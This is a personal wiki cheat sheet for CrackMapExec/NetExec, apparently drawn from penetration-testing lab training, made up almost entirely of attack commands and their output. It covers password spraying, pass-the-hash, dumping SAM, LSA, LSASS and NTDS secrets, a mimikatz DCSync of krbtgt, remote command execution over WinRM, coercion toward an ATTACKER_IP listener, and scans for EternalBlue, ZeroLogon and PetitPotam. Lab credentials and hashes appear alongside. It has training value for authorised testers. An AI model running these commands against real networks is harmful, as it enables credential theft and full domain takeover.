Wiki
CME
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)
Domain SID
nxc ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid
Outdated OS
nxc ldap IP_RANGE -u username -p password -M obsolete
EternalBlue - MS17-010
[Apr 08, 2024 - 02:26:06 (EDT)] exegol-CPTS /workspace # nxc smb "10.129.201.97" -u '' -p '' -M ms17-010
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
SMB 10.129.201.97 445 SHELLS-WINBLUE [*] Windows Server 2016 Standard 14393 x64 (name:SHELLS-WINBLUE) (domain:SHELLS-WINBLUE) (signing:False) (SMBv1:True)
SMB 10.129.201.97 445 SHELLS-WINBLUE [+] SHELLS-WINBLUE\:
MS17-010 [+] 10.129.201.97 is likely VULNERABLE to MS17-010! (Windows Server 2016 Standard 14393)
Printerbug
nxc smb IP_RANGE -u username -p password -M printerbug -o LISTENER=ATTACKER_IP
Source: https://x.com/al3x_n3ff/status/1770238201598267468
Password policy
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
Password Spraying
SMB Bruteforcecrackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-success
cme smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce --continue-on-success
SMB
SMB (445, 139) / RPCShares
$ crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares
SMB 10.129.42.197 445 WINSRV [*] Windows 10.0 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB 10.129.42.197 445 WINSRV [+] WINSRV\user:password
SMB 10.129.42.197 445 WINSRV [+] Enumerated shares
SMB 10.129.42.197 445 WINSRV Share Permissions Remark
SMB 10.129.42.197 445 WINSRV ----- ----------- ------
SMB 10.129.42.197 445 WINSRV ADMIN$ Remote Admin
SMB 10.129.42.197 445 WINSRV C$ Default share
SMB 10.129.42.197 445 WINSRV SHARENAME READ,WRITE
SMB 10.129.42.197 445 WINSRV IPC$ READ Remote IPC
Users List
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
Logged-on users
$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
Autologon users
nxc smb IP -u username -p password -M reg-winlogon
Source: https://x.com/al3x_n3ff/status/1774787873104900448
Group Password Policy - GPP
nxc smb 10.129.202.85 -u jmarston -p 'P@ssword!' -M gpp_password
$ crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [+] Found SYSVOL share
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [*] Searching for Registry.xml
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [*] Found INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [+] Found credentials in INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Usernames: ['guarddesk']
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Domains: ['INLANEFREIGHT.LOCAL']
GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Passwords: ['ILFreightguardadmin!']
Dump SAM
SAM & LSA secretsYou need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
Dump LSA
SAM & LSA secretsYou need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
If you found an account starting with SC_GMSA{84A78B8C-56EE-465b-8496-FFB35A1B52A7} you can get the account behind:
nxc ldap <ip> -u <user> -p <pass> --gmsa-decrypt-lsa '_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_313e25a880eb773502f03ad5021f49c2eb5b5be2a09f9883ae0d83308dbfa724:01000000240200001000120114021c02fbb096d10991bb88c3f54e153807b4c1cc009d30bc3c5<---SNIP--->cd88f866c12160313f9e6884b510840e90f4c5ee5a032d40000f0650a4489170000f0073a9188170000'
Dump LSASS secrets
LSASS secretsnxc smb 192.168.255.131 -u administrator -p pass -M lsassy
nxc smb 192.168.255.131 -u administrator -p pass -M nanodump
nxc smb 192.168.255.131 -u administrator -p pass -M mimikatz
nxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"
SMB Module handlekatz: [*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz
SMB module procdump: [*] procdump Get lsass dump using procdump64 and parse the result with pypykatz
Dump NTDS
NTDS secrets#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' -M ntdsutil
Pass the Hash (PtH)
Pass the Hash (PtH)#~ nxc smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
#~ nxc smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
#~ nxc smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
#~ nxc smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
WinRM
WinRM (5985, 5986)$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)
Command Execution
[Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\'
SMB 10.129.202.136 445 WINSRV [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM 10.129.202.136 5985 WINSRV [+] WINSRV\john:november (admin)
WINRM 10.129.202.136 5985 WINSRV [+] Executed command (shell type: powershell)
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Directory: C:\
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Mode LastWriteTime Length Name
WINRM 10.129.202.136 5985 WINSRV ---- ------------- ------ ----
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM PerfLogs
WINRM 10.129.202.136 5985 WINSRV d-r--- 12/14/2020 6:38 PM Program Files
WINRM 10.129.202.136 5985 WINSRV d----- 2/11/2022 6:10 AM Program Files (x86)
WINRM 10.129.202.136 5985 WINSRV d-r--- 1/6/2022 6:49 AM Users
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM Windows
WINRM 10.129.202.136 5985 WINSRV
[Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace #
SSH
SSH (22)nxc ssh 10.129.245.201 -u sam -p mut_password.list
LDAP - Users
To enumerate all users via LDAP:
nxc ldap $ip -u $user -p $password --users
To enumerate just the active users via LDAP:
nxc ldap $ip -u $user -p $password --active-users
Scan for vulnerabilities
Windows ExploitScan for multiple vulns
nxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M spooler -M printnightmare -M shadowcoerce -M petitpotam
ZeroLogon
nxc smb <ip> -u '' -p '' -M zerologon
PetitPotam
nxc smb <ip> -u '' -p '' -M petitpotam
noPAC
nxc smb <ip> -u 'user' -p 'pass' -M nopac
